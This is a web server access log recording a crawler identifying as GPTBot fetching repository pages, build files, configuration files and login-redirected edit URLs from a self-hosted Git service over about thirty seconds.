"/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:05:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21749] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21751] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21748] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21748] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9986] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21749] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9990] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21752] [Gzip 28.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf?display=source" [Client 74.7.227.38] [Length 12744] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12955] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12782] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13862] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf?display=source" [Client 74.7.227.38] [Length 12753] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf?display=source" [Client 74.7.227.38] [Length 13642] [Gzip 4.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12983] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=furthestduedate&state=all" [Client 74.7.227.38] [Length 8500] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=furthestduedate&state=open" +[17/Feb/2026:16:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/Hero.tsx" +[17/Feb/2026:16:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol" [Client 74.7.227.38] [Length 18643] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" +[17/Feb/2026:16:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" +[17/Feb/2026:16:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:16:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:16:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:16:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldBar.ico" [Client 74.7.227.38] [Length 24524] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldBar.ico" +[17/Feb/2026:16:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldBar.png" [Client 74.7.227.38] [Length 24514] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldBar.png" +[17/Feb/2026:16:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fReadMe.md" [Client 74.7.227.38] [Length 26274] [Gzip 4.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/ReadMe.md" +[17/Feb/2026:16:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf?display=source" [Client 74.7.227.38] [Length 12987] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:06:00 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol" +[17/Feb/2026:16:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol" [Client 74.7.227.38] [Length 9820] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:06:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol" +[17/Feb/2026:16:06:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:16:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] 